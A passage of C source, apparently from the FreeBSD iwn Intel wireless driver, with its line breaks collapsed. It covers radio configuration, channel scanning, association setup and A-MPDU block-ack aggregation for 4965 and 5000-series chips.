0) { device_printf(sc->sc_dev, "%s: could not configure bluetooth coexistence, error %d\n", __func__, error); return error; } /* Set mode, channel, RX filter and enable RX. */ sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; memset(sc->rxon, 0, sizeof (struct iwn_rxon)); IEEE80211_ADDR_COPY(sc->rxon->myaddr, IF_LLADDR(ifp)); IEEE80211_ADDR_COPY(sc->rxon->wlap, IF_LLADDR(ifp)); sc->rxon->chan = ieee80211_chan2ieee(ic, ic->ic_curchan); sc->rxon->flags = htole32(IWN_RXON_TSF | IWN_RXON_CTS_TO_SELF); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) sc->rxon->flags |= htole32(IWN_RXON_AUTO | IWN_RXON_24GHZ); switch (ic->ic_opmode) { case IEEE80211_M_STA: sc->rxon->mode = IWN_MODE_STA; sc->rxon->filter = htole32(IWN_FILTER_MULTICAST); break; case IEEE80211_M_MONITOR: sc->rxon->mode = IWN_MODE_MONITOR; sc->rxon->filter = htole32(IWN_FILTER_MULTICAST | IWN_FILTER_CTL | IWN_FILTER_PROMISC); break; default: /* Should not get there. */ break; } sc->rxon->cck_mask = 0x0f; /* not yet negotiated */ sc->rxon->ofdm_mask = 0xff; /* not yet negotiated */ sc->rxon->ht_single_mask = 0xff; sc->rxon->ht_dual_mask = 0xff; sc->rxon->ht_triple_mask = 0xff; rxchain = IWN_RXCHAIN_VALID(sc->rxchainmask) | IWN_RXCHAIN_MIMO_COUNT(2) | IWN_RXCHAIN_IDLE_COUNT(2); sc->rxon->rxchain = htole16(rxchain); DPRINTF(sc, IWN_DEBUG_RESET, "%s: setting configuration\n", __func__); if (sc->sc_is_scanning) device_printf(sc->sc_dev, "%s: is_scanning set, before RXON\n", __func__); error = iwn_cmd(sc, IWN_CMD_RXON, sc->rxon, sc->rxonsz, 0); if (error != 0) { device_printf(sc->sc_dev, "%s: RXON command failed\n", __func__); return error; } if ((error = iwn_add_broadcast_node(sc, 0)) != 0) { device_printf(sc->sc_dev, "%s: could not add broadcast node\n", __func__); return error; } /* Configuration has changed, set TX power accordingly. */ if ((error = ops->set_txpower(sc, ic->ic_curchan, 0)) != 0) { device_printf(sc->sc_dev, "%s: could not set TX power\n", __func__); return error; } if ((error = iwn_set_critical_temp(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not set critical temperature\n", __func__); return error; } /* Set power saving level to CAM during initialization. */ if ((error = iwn_set_pslevel(sc, 0, 0, 0)) != 0) { device_printf(sc->sc_dev, "%s: could not set power saving level\n", __func__); return error; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } /* * Add an ssid element to a frame. */ static uint8_t * ieee80211_add_ssid(uint8_t *frm, const uint8_t *ssid, u_int len) { *frm++ = IEEE80211_ELEMID_SSID; *frm++ = len; memcpy(frm, ssid, len); return frm + len; } static uint16_t iwn_get_active_dwell_time(struct iwn_softc *sc, struct ieee80211_channel *c, uint8_t n_probes) { /* No channel? Default to 2GHz settings */ if (c == NULL || IEEE80211_IS_CHAN_2GHZ(c)) { return (IWN_ACTIVE_DWELL_TIME_2GHZ + IWN_ACTIVE_DWELL_FACTOR_2GHZ * (n_probes + 1)); } /* 5GHz dwell time */ return (IWN_ACTIVE_DWELL_TIME_5GHZ + IWN_ACTIVE_DWELL_FACTOR_5GHZ * (n_probes + 1)); } /* * Limit the total dwell time to 85% of the beacon interval. * * Returns the dwell time in milliseconds. */ static uint16_t iwn_limit_dwell(struct iwn_softc *sc, uint16_t dwell_time) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = NULL; int bintval = 0; /* bintval is in TU (1.024mS) */ if (! TAILQ_EMPTY(&ic->ic_vaps)) { vap = TAILQ_FIRST(&ic->ic_vaps); bintval = vap->iv_bss->ni_intval; } /* * If it's non-zero, we should calculate the minimum of * it and the DWELL_BASE. * * XXX Yes, the math should take into account that bintval * is 1.024mS, not 1mS.. */ if (bintval > 0) { DPRINTF(sc, IWN_DEBUG_SCAN, "%s: bintval=%d\n", __func__, bintval); return (MIN(IWN_PASSIVE_DWELL_BASE, ((bintval * 85) / 100))); } /* No association context? Default */ return (IWN_PASSIVE_DWELL_BASE); } static uint16_t iwn_get_passive_dwell_time(struct iwn_softc *sc, struct ieee80211_channel *c) { uint16_t passive; if (c == NULL || IEEE80211_IS_CHAN_2GHZ(c)) { passive = IWN_PASSIVE_DWELL_BASE + IWN_PASSIVE_DWELL_TIME_2GHZ; } else { passive = IWN_PASSIVE_DWELL_BASE + IWN_PASSIVE_DWELL_TIME_5GHZ; } /* Clamp to the beacon interval if we're associated */ return (iwn_limit_dwell(sc, passive)); } static int iwn_scan(struct iwn_softc *sc, struct ieee80211vap *vap, struct ieee80211_scan_state *ss, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni = vap->iv_bss; struct iwn_scan_hdr *hdr; struct iwn_cmd_data *tx; struct iwn_scan_essid *essid; struct iwn_scan_chan *chan; struct ieee80211_frame *wh; struct ieee80211_rateset *rs; uint8_t *buf, *frm; uint16_t rxchain; uint8_t txant; int buflen, error; int is_active; uint16_t dwell_active, dwell_passive; uint32_t extra, scan_service_time; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* * We are absolutely not allowed to send a scan command when another * scan command is pending. */ if (sc->sc_is_scanning) { device_printf(sc->sc_dev, "%s: called whilst scanning!\n", __func__); return (EAGAIN); } /* Assign the scan channel */ c = ic->ic_curchan; sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; buf = malloc(IWN_SCAN_MAXSZ, M_DEVBUF, M_NOWAIT | M_ZERO); if (buf == NULL) { device_printf(sc->sc_dev, "%s: could not allocate buffer for scan command\n", __func__); return ENOMEM; } hdr = (struct iwn_scan_hdr *)buf; /* * Move to the next channel if no frames are received within 10ms * after sending the probe request. */ hdr->quiet_time = htole16(10); /* timeout in milliseconds */ hdr->quiet_threshold = htole16(1); /* min # of packets */ /* * Max needs to be greater than active and passive and quiet! * It's also in microseconds! */ hdr->max_svc = htole32(250 * 1024); /* * Reset scan: interval=100 * Normal scan: interval=becaon interval * suspend_time: 100 (TU) * */ extra = (100 /* suspend_time */ / 100 /* beacon interval */) << 22; //scan_service_time = extra | ((100 /* susp */ % 100 /* int */) * 1024); scan_service_time = (4 << 22) | (100 * 1024); /* Hardcode for now! */ hdr->pause_svc = htole32(scan_service_time); /* Select antennas for scanning. */ rxchain = IWN_RXCHAIN_VALID(sc->rxchainmask) | IWN_RXCHAIN_FORCE_MIMO_SEL(sc->rxchainmask) | IWN_RXCHAIN_DRIVER_FORCE; if (IEEE80211_IS_CHAN_A(c) && sc->hw_type == IWN_HW_REV_TYPE_4965) { /* Ant A must be avoided in 5GHz because of an HW bug. */ rxchain |= IWN_RXCHAIN_FORCE_SEL(IWN_ANT_B); } else /* Use all available RX antennas. */ rxchain |= IWN_RXCHAIN_FORCE_SEL(sc->rxchainmask); hdr->rxchain = htole16(rxchain); hdr->filter = htole32(IWN_FILTER_MULTICAST | IWN_FILTER_BEACON); tx = (struct iwn_cmd_data *)(hdr + 1); tx->flags = htole32(IWN_TX_AUTO_SEQ); tx->id = sc->broadcast_id; tx->lifetime = htole32(IWN_LIFETIME_INFINITE); if (IEEE80211_IS_CHAN_5GHZ(c)) { /* Send probe requests at 6Mbps. */ tx->rate = htole32(0xd); rs = &ic->ic_sup_rates[IEEE80211_MODE_11A]; } else { hdr->flags = htole32(IWN_RXON_24GHZ | IWN_RXON_AUTO); if (sc->hw_type == IWN_HW_REV_TYPE_4965 && sc->rxon->associd && sc->rxon->chan > 14) tx->rate = htole32(0xd); else { /* Send probe requests at 1Mbps. */ tx->rate = htole32(10 | IWN_RFLAG_CCK); } rs = &ic->ic_sup_rates[IEEE80211_MODE_11G]; } /* Use the first valid TX antenna. */ txant = IWN_LSB(sc->txchainmask); tx->rate |= htole32(IWN_RFLAG_ANT(txant)); /* * Only do active scanning if we're announcing a probe request * for a given SSID (or more, if we ever add it to the driver.) */ is_active = 0; /* * If we're scanning for a specific SSID, add it to the command. * * XXX maybe look at adding support for scanning multiple SSIDs? */ essid = (struct iwn_scan_essid *)(tx + 1); if (ss != NULL) { if (ss->ss_ssid[0].len != 0) { essid[0].id = IEEE80211_ELEMID_SSID; essid[0].len = ss->ss_ssid[0].len; memcpy(essid[0].data, ss->ss_ssid[0].ssid, ss->ss_ssid[0].len); } DPRINTF(sc, IWN_DEBUG_SCAN, "%s: ssid_len=%d, ssid=%*s\n", __func__, ss->ss_ssid[0].len, ss->ss_ssid[0].len, ss->ss_ssid[0].ssid); if (ss->ss_nssid > 0) is_active = 1; } /* * Build a probe request frame. Most of the following code is a * copy & paste of what is done in net80211. */ wh = (struct ieee80211_frame *)(essid + 20); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_REQ; wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, ifp->if_broadcastaddr); IEEE80211_ADDR_COPY(wh->i_addr2, IF_LLADDR(ifp)); IEEE80211_ADDR_COPY(wh->i_addr3, ifp->if_broadcastaddr); *(uint16_t *)&wh->i_dur[0] = 0; /* filled by HW */ *(uint16_t *)&wh->i_seq[0] = 0; /* filled by HW */ frm = (uint8_t *)(wh + 1); frm = ieee80211_add_ssid(frm, NULL, 0); frm = ieee80211_add_rates(frm, rs); if (rs->rs_nrates > IEEE80211_RATE_SIZE) frm = ieee80211_add_xrates(frm, rs); if (ic->ic_htcaps & IEEE80211_HTC_HT) frm = ieee80211_add_htcap(frm, ni); /* Set length of probe request. */ tx->len = htole16(frm - (uint8_t *)wh); /* * If active scanning is requested but a certain channel is * marked passive, we can do active scanning if we detect * transmissions. * * There is an issue with some firmware versions that triggers * a sysassert on a "good CRC threshold" of zero (== disabled), * on a radar channel even though this means that we should NOT * send probes. * * The "good CRC threshold" is the number of frames that we * need to receive during our dwell time on a channel before * sending out probes -- setting this to a huge value will * mean we never reach it, but at the same time work around * the aforementioned issue. Thus use IWL_GOOD_CRC_TH_NEVER * here instead of IWL_GOOD_CRC_TH_DISABLED. * * This was fixed in later versions along with some other * scan changes, and the threshold behaves as a flag in those * versions. */ /* * If we're doing active scanning, set the crc_threshold * to a suitable value. This is different to active veruss * passive scanning depending upon the channel flags; the * firmware will obey that particular check for us. */ if (sc->tlv_feature_flags & IWN_UCODE_TLV_FLAGS_NEWSCAN) hdr->crc_threshold = is_active ? IWN_GOOD_CRC_TH_DEFAULT : IWN_GOOD_CRC_TH_DISABLED; else hdr->crc_threshold = is_active ? IWN_GOOD_CRC_TH_DEFAULT : IWN_GOOD_CRC_TH_NEVER; chan = (struct iwn_scan_chan *)frm; chan->chan = htole16(ieee80211_chan2ieee(ic, c)); chan->flags = 0; if (ss->ss_nssid > 0) chan->flags |= htole32(IWN_CHAN_NPBREQS(1)); chan->dsp_gain = 0x6e; /* * Set the passive/active flag depending upon the channel mode. * XXX TODO: take the is_active flag into account as well? */ if (c->ic_flags & IEEE80211_CHAN_PASSIVE) chan->flags |= htole32(IWN_CHAN_PASSIVE); else chan->flags |= htole32(IWN_CHAN_ACTIVE); /* * Calculate the active/passive dwell times. */ dwell_active = iwn_get_active_dwell_time(sc, c, ss->ss_nssid); dwell_passive = iwn_get_passive_dwell_time(sc, c); /* Make sure they're valid */ if (dwell_passive <= dwell_active) dwell_passive = dwell_active + 1; chan->active = htole16(dwell_active); chan->passive = htole16(dwell_passive); if (IEEE80211_IS_CHAN_5GHZ(c) && !(c->ic_flags & IEEE80211_CHAN_PASSIVE)) { chan->rf_gain = 0x3b; } else if (IEEE80211_IS_CHAN_5GHZ(c)) { chan->rf_gain = 0x3b; } else if (!(c->ic_flags & IEEE80211_CHAN_PASSIVE)) { chan->rf_gain = 0x28; } else { chan->rf_gain = 0x28; } DPRINTF(sc, IWN_DEBUG_STATE, "%s: chan %u flags 0x%x rf_gain 0x%x " "dsp_gain 0x%x active %d passive %d scan_svc_time %d crc 0x%x " "isactive=%d numssid=%d\n", __func__, chan->chan, chan->flags, chan->rf_gain, chan->dsp_gain, dwell_active, dwell_passive, scan_service_time, hdr->crc_threshold, is_active, ss->ss_nssid); hdr->nchan++; chan++; buflen = (uint8_t *)chan - buf; hdr->len = htole16(buflen); if (sc->sc_is_scanning) { device_printf(sc->sc_dev, "%s: called with is_scanning set!\n", __func__); } sc->sc_is_scanning = 1; DPRINTF(sc, IWN_DEBUG_STATE, "sending scan command nchan=%d\n", hdr->nchan); error = iwn_cmd(sc, IWN_CMD_SCAN, buf, buflen, 1); free(buf, M_DEVBUF); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return error; } static int iwn_auth(struct iwn_softc *sc, struct ieee80211vap *vap) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni = vap->iv_bss; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; /* Update adapter configuration. */ IEEE80211_ADDR_COPY(sc->rxon->bssid, ni->ni_bssid); sc->rxon->chan = ieee80211_chan2ieee(ic, ni->ni_chan); sc->rxon->flags = htole32(IWN_RXON_TSF | IWN_RXON_CTS_TO_SELF); if (IEEE80211_IS_CHAN_2GHZ(ni->ni_chan)) sc->rxon->flags |= htole32(IWN_RXON_AUTO | IWN_RXON_24GHZ); if (ic->ic_flags & IEEE80211_F_SHSLOT) sc->rxon->flags |= htole32(IWN_RXON_SHSLOT); if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) sc->rxon->flags |= htole32(IWN_RXON_SHPREAMBLE); if (IEEE80211_IS_CHAN_A(ni->ni_chan)) { sc->rxon->cck_mask = 0; sc->rxon->ofdm_mask = 0x15; } else if (IEEE80211_IS_CHAN_B(ni->ni_chan)) { sc->rxon->cck_mask = 0x03; sc->rxon->ofdm_mask = 0; } else { /* Assume 802.11b/g. */ sc->rxon->cck_mask = 0x03; sc->rxon->ofdm_mask = 0x15; } DPRINTF(sc, IWN_DEBUG_STATE, "rxon chan %d flags %x cck %x ofdm %x\n", sc->rxon->chan, sc->rxon->flags, sc->rxon->cck_mask, sc->rxon->ofdm_mask); if (sc->sc_is_scanning) device_printf(sc->sc_dev, "%s: is_scanning set, before RXON\n", __func__); error = iwn_cmd(sc, IWN_CMD_RXON, sc->rxon, sc->rxonsz, 1); if (error != 0) { device_printf(sc->sc_dev, "%s: RXON command failed, error %d\n", __func__, error); return error; } /* Configuration has changed, set TX power accordingly. */ if ((error = ops->set_txpower(sc, ni->ni_chan, 1)) != 0) { device_printf(sc->sc_dev, "%s: could not set TX power, error %d\n", __func__, error); return error; } /* * Reconfiguring RXON clears the firmware nodes table so we must * add the broadcast node again. */ if ((error = iwn_add_broadcast_node(sc, 1)) != 0) { device_printf(sc->sc_dev, "%s: could not add broadcast node, error %d\n", __func__, error); return error; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } static int iwn_run(struct iwn_softc *sc, struct ieee80211vap *vap) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni = vap->iv_bss; struct iwn_node_info node; uint32_t htflags = 0; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; if (ic->ic_opmode == IEEE80211_M_MONITOR) { /* Link LED blinks while monitoring. */ iwn_set_led(sc, IWN_LED_LINK, 5, 5); return 0; } if ((error = iwn_set_timing(sc, ni)) != 0) { device_printf(sc->sc_dev, "%s: could not set timing, error %d\n", __func__, error); return error; } /* Update adapter configuration. */ IEEE80211_ADDR_COPY(sc->rxon->bssid, ni->ni_bssid); sc->rxon->associd = htole16(IEEE80211_AID(ni->ni_associd)); sc->rxon->chan = ieee80211_chan2ieee(ic, ni->ni_chan); sc->rxon->flags = htole32(IWN_RXON_TSF | IWN_RXON_CTS_TO_SELF); if (IEEE80211_IS_CHAN_2GHZ(ni->ni_chan)) sc->rxon->flags |= htole32(IWN_RXON_AUTO | IWN_RXON_24GHZ); if (ic->ic_flags & IEEE80211_F_SHSLOT) sc->rxon->flags |= htole32(IWN_RXON_SHSLOT); if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) sc->rxon->flags |= htole32(IWN_RXON_SHPREAMBLE); if (IEEE80211_IS_CHAN_A(ni->ni_chan)) { sc->rxon->cck_mask = 0; sc->rxon->ofdm_mask = 0x15; } else if (IEEE80211_IS_CHAN_B(ni->ni_chan)) { sc->rxon->cck_mask = 0x03; sc->rxon->ofdm_mask = 0; } else { /* Assume 802.11b/g. */ sc->rxon->cck_mask = 0x0f; sc->rxon->ofdm_mask = 0x15; } if (IEEE80211_IS_CHAN_HT(ni->ni_chan)) { htflags |= IWN_RXON_HT_PROTMODE(ic->ic_curhtprotmode); if (IEEE80211_IS_CHAN_HT40(ni->ni_chan)) { switch (ic->ic_curhtprotmode) { case IEEE80211_HTINFO_OPMODE_HT20PR: htflags |= IWN_RXON_HT_MODEPURE40; break; default: htflags |= IWN_RXON_HT_MODEMIXED; break; } } if (IEEE80211_IS_CHAN_HT40D(ni->ni_chan)) htflags |= IWN_RXON_HT_HT40MINUS; } sc->rxon->flags |= htole32(htflags); sc->rxon->filter |= htole32(IWN_FILTER_BSS); DPRINTF(sc, IWN_DEBUG_STATE, "rxon chan %d flags %x\n", sc->rxon->chan, sc->rxon->flags); if (sc->sc_is_scanning) device_printf(sc->sc_dev, "%s: is_scanning set, before RXON\n", __func__); error = iwn_cmd(sc, IWN_CMD_RXON, sc->rxon, sc->rxonsz, 1); if (error != 0) { device_printf(sc->sc_dev, "%s: could not update configuration, error %d\n", __func__, error); return error; } /* Configuration has changed, set TX power accordingly. */ if ((error = ops->set_txpower(sc, ni->ni_chan, 1)) != 0) { device_printf(sc->sc_dev, "%s: could not set TX power, error %d\n", __func__, error); return error; } /* Fake a join to initialize the TX rate. */ ((struct iwn_node *)ni)->id = IWN_ID_BSS; iwn_newassoc(ni, 1); /* Add BSS node. */ memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.macaddr, ni->ni_macaddr); node.id = IWN_ID_BSS; if (IEEE80211_IS_CHAN_HT(ni->ni_chan)) { switch (ni->ni_htcap & IEEE80211_HTCAP_SMPS) { case IEEE80211_HTCAP_SMPS_ENA: node.htflags |= htole32(IWN_SMPS_MIMO_DIS); break; case IEEE80211_HTCAP_SMPS_DYNAMIC: node.htflags |= htole32(IWN_SMPS_MIMO_PROT); break; } node.htflags |= htole32(IWN_AMDPU_SIZE_FACTOR(3) | IWN_AMDPU_DENSITY(5)); /* 4us */ if (IEEE80211_IS_CHAN_HT40(ni->ni_chan)) node.htflags |= htole32(IWN_NODE_HT40); } DPRINTF(sc, IWN_DEBUG_STATE, "%s: adding BSS node\n", __func__); error = ops->add_node(sc, &node, 1); if (error != 0) { device_printf(sc->sc_dev, "%s: could not add BSS node, error %d\n", __func__, error); return error; } DPRINTF(sc, IWN_DEBUG_STATE, "%s: setting link quality for node %d\n", __func__, node.id); if ((error = iwn_set_link_quality(sc, ni)) != 0) { device_printf(sc->sc_dev, "%s: could not setup link quality for node %d, error %d\n", __func__, node.id, error); return error; } if ((error = iwn_init_sensitivity(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not set sensitivity, error %d\n", __func__, error); return error; } /* Start periodic calibration timer. */ sc->calib.state = IWN_CALIB_STATE_ASSOC; sc->calib_cnt = 0; callout_reset(&sc->calib_to, msecs_to_ticks(500), iwn_calib_timeout, sc); /* Link LED always on while associated. */ iwn_set_led(sc, IWN_LED_LINK, 0, 1); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } /* * This function is called by upper layer when an ADDBA request is received * from another STA and before the ADDBA response is sent. */ static int iwn_ampdu_rx_start(struct ieee80211_node *ni, struct ieee80211_rx_ampdu *rap, int baparamset, int batimeout, int baseqctl) { #define MS(_v, _f) (((_v) & _f) >> _f##_S) struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct iwn_ops *ops = &sc->ops; struct iwn_node *wn = (void *)ni; struct iwn_node_info node; uint16_t ssn; uint8_t tid; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); tid = MS(le16toh(baparamset), IEEE80211_BAPS_TID); ssn = MS(le16toh(baseqctl), IEEE80211_BASEQ_START); memset(&node, 0, sizeof node); node.id = wn->id; node.control = IWN_NODE_UPDATE; node.flags = IWN_FLAG_SET_ADDBA; node.addba_tid = tid; node.addba_ssn = htole16(ssn); DPRINTF(sc, IWN_DEBUG_RECV, "ADDBA RA=%d TID=%d SSN=%d\n", wn->id, tid, ssn); error = ops->add_node(sc, &node, 1); if (error != 0) return error; return sc->sc_ampdu_rx_start(ni, rap, baparamset, batimeout, baseqctl); #undef MS } /* * This function is called by upper layer on teardown of an HT-immediate * Block Ack agreement (eg. uppon receipt of a DELBA frame). */ static void iwn_ampdu_rx_stop(struct ieee80211_node *ni, struct ieee80211_rx_ampdu *rap) { struct ieee80211com *ic = ni->ni_ic; struct iwn_softc *sc = ic->ic_ifp->if_softc; struct iwn_ops *ops = &sc->ops; struct iwn_node *wn = (void *)ni; struct iwn_node_info node; uint8_t tid; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* XXX: tid as an argument */ for (tid = 0; tid < WME_NUM_TID; tid++) { if (&ni->ni_rx_ampdu[tid] == rap) break; } memset(&node, 0, sizeof node); node.id = wn->id; node.control = IWN_NODE_UPDATE; node.flags = IWN_FLAG_SET_DELBA; node.delba_tid = tid; DPRINTF(sc, IWN_DEBUG_RECV, "DELBA RA=%d TID=%d\n", wn->id, tid); (void)ops->add_node(sc, &node, 1); sc->sc_ampdu_rx_stop(ni, rap); } static int iwn_addba_request(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int dialogtoken, int baparamset, int batimeout) { struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; int qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); for (qid = sc->firstaggqueue; qid < sc->ntxqs; qid++) { if (sc->qid2tap[qid] == NULL) break; } if (qid == sc->ntxqs) { DPRINTF(sc, IWN_DEBUG_XMIT, "%s: not free aggregation queue\n", __func__); return 0; } tap->txa_private = malloc(sizeof(int), M_DEVBUF, M_NOWAIT); if (tap->txa_private == NULL) { device_printf(sc->sc_dev, "%s: failed to alloc TX aggregation structure\n", __func__); return 0; } sc->qid2tap[qid] = tap; *(int *)tap->txa_private = qid; return sc->sc_addba_request(ni, tap, dialogtoken, baparamset, batimeout); } static int iwn_addba_response(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int code, int baparamset, int batimeout) { struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; int qid = *(int *)tap->txa_private; uint8_t tid = tap->txa_tid; int ret; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (code == IEEE80211_STATUS_SUCCESS) { ni->ni_txseqs[tid] = tap->txa_start & 0xfff; ret = iwn_ampdu_tx_start(ni->ni_ic, ni, tid); if (ret != 1) return ret; } else { sc->qid2tap[qid] = NULL; free(tap->txa_private, M_DEVBUF); tap->txa_private = NULL; } return sc->sc_addba_response(ni, tap, code, baparamset, batimeout); } /* * This function is called by upper layer when an ADDBA response is received * from another STA. */ static int iwn_ampdu_tx_start(struct ieee80211com *ic, struct ieee80211_node *ni, uint8_t tid) { struct ieee80211_tx_ampdu *tap = &ni->ni_tx_ampdu[tid]; struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct iwn_ops *ops = &sc->ops; struct iwn_node *wn = (void *)ni; struct iwn_node_info node; int error, qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Enable TX for the specified RA/TID. */ wn->disable_tid &= ~(1 << tid); memset(&node, 0, sizeof node); node.id = wn->id; node.control = IWN_NODE_UPDATE; node.flags = IWN_FLAG_SET_DISABLE_TID; node.disable_tid = htole16(wn->disable_tid); error = ops->add_node(sc, &node, 1); if (error != 0) return 0; if ((error = iwn_nic_lock(sc)) != 0) return 0; qid = *(int *)tap->txa_private; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: ra=%d tid=%d ssn=%d qid=%d\n", __func__, wn->id, tid, tap->txa_start, qid); ops->ampdu_tx_start(sc, ni, qid, tid, tap->txa_start & 0xfff); iwn_nic_unlock(sc); iwn_set_link_quality(sc, ni); return 1; } static void iwn_ampdu_tx_stop(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap) { struct iwn_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct iwn_ops *ops = &sc->ops; uint8_t tid = tap->txa_tid; int qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); sc->sc_addba_stop(ni, tap); if (tap->txa_private == NULL) return; qid = *(int *)tap->txa_private; if (sc->txq[qid].queued != 0) return; if (iwn_nic_lock(sc) != 0) return; ops->ampdu_tx_stop(sc, qid, tid, tap->txa_start & 0xfff); iwn_nic_unlock(sc); sc->qid2tap[qid] = NULL; free(tap->txa_private, M_DEVBUF); tap->txa_private = NULL; } static void iwn4965_ampdu_tx_start(struct iwn_softc *sc, struct ieee80211_node *ni, int qid, uint8_t tid, uint16_t ssn) { struct iwn_node *wn = (void *)ni; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Stop TX scheduler while we're changing its configuration. */ iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_CHGACT); /* Assign RA/TID translation to the queue. */ iwn_mem_write_2(sc, sc->sched_base + IWN4965_SCHED_TRANS_TBL(qid), wn->id << 4 | tid); /* Enable chain-building mode for the queue. */ iwn_prph_setbits(sc, IWN4965_SCHED_QCHAIN_SEL, 1 << qid); /* Set starting sequence number from the ADDBA request. */ sc->txq[qid].cur = sc->txq[qid].read = (ssn & 0xff); IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | (ssn & 0xff)); iwn_prph_write(sc, IWN4965_SCHED_QUEUE_RDPTR(qid), ssn); /* Set scheduler window size. */ iwn_mem_write(sc, sc->sched_base + IWN4965_SCHED_QUEUE_OFFSET(qid), IWN_SCHED_WINSZ); /* Set scheduler frame limit. */ iwn_mem_write(sc, sc->sched_base + IWN4965_SCHED_QUEUE_OFFSET(qid) + 4, IWN_SCHED_LIMIT << 16); /* Enable interrupts for the queue. */ iwn_prph_setbits(sc, IWN4965_SCHED_INTR_MASK, 1 << qid); /* Mark the queue as active. */ iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_ACTIVE | IWN4965_TXQ_STATUS_AGGR_ENA | iwn_tid2fifo[tid] << 1); } static void iwn4965_ampdu_tx_stop(struct iwn_softc *sc, int qid, uint8_t tid, uint16_t ssn) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Stop TX scheduler while we're changing its configuration. */ iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_CHGACT); /* Set starting sequence number from the ADDBA request. */ IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | (ssn & 0xff)); iwn_prph_write(sc, IWN4965_SCHED_QUEUE_RDPTR(qid), ssn); /* Disable interrupts for the queue. */ iwn_prph_clrbits(sc, IWN4965_SCHED_INTR_MASK, 1 << qid); /* Mark the queue as inactive. */ iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_INACTIVE | iwn_tid2fifo[tid] << 1); } static void iwn5000_ampdu_tx_start(struct iwn_softc *sc, struct ieee80211_node *ni, int qid, uint8_t tid, uint16_t ssn) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); struct iwn_node *wn = (void *)ni; /* Stop TX scheduler while we're changing its configuration. */ iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_CHGACT); /* Assign RA/TID translation to the queue. */ iwn_mem_write_2(sc, sc->sched_base + IWN5000_SCHED_TRANS_TBL(qid), wn->id << 4 | tid); /* Enable chain-building mode for the queue. */ iwn_prph_setbits(sc, IWN5000_SCHED_QCHAIN_SEL, 1 << qid); /* Enable aggregation for the queue. */ iwn_prph_setbits(sc, IWN5000_SCHED_AGGR_SEL, 1 << qid); /* Set starting sequence number from the ADDBA request. */ sc->txq[qid].cur = sc->txq[qid].read = (ssn & 0xff); IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | (ssn & 0xff)); iwn_prph_write(sc, IWN5000_SCHED_QUEUE_RDPTR(qid), ssn); /* Set scheduler window size and frame limit. */ iwn_mem_write(sc, sc->sched_base + IWN5000_SCHED_QUEUE_OFFSET(qid) + 4, IWN_SCHED_LIMIT << 16 | IWN_SCHED_WINSZ); /* Enable interrupts for the queue. */ iwn_prph_setbits(sc, IWN5000_SCHED_INTR_MASK, 1 << qid); /* Mark the queue as active. */ iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_ACTIVE | iwn_tid2fifo[tid]); } static void iwn5000_ampdu_tx_stop(struct iwn_softc *sc, int qid, uint8_t tid, uint16_t ssn) { DPRINTF(sc, IWN_DEBUG_TRACE, 